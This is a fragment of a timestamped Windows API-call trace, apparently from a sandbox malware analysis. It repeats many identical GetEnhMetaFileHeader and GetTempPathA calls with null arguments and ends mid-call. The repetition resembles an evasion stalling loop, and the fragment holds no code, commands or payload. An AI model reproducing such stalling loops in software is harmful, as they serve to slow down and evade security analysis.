GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.198] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.199] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.200] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.224] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.225] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.226] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 